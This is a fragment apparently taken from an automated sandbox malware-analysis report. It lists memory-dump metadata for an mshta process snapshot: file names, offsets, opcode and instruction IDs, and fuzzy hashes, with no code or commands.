                                            • Source File: 00000017.00000003.329029258.000002376B0E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376B0E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_23_3_2376b0e0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                                            • Instruction ID: 0e7ab654e62692a67c5164f66ca4c7807296d2dd7e412f3432e251b67a1fd6df
                                            • Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                                            • Instruction Fuzzy Hash: FCB0920446EE8A4EDA1212B30C6A2592F60AA47114FC919C68045C9092E40C069A5222
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000017.00000003.329029258.000002376B0E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376B0E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_23_3_2376b0e0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                            • Instruction ID: a75c39cd1706a91c408f836368424cf0a4f1070eb0cff60411727cba2b91e563
                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                            • Instruction Fuzzy Hash: C290024449DC0E55D82411D20C5B75C55446389150FD44880841694544E84D03A71552
                                            Uniqueness

                                            Uniqueness Score: -1.00%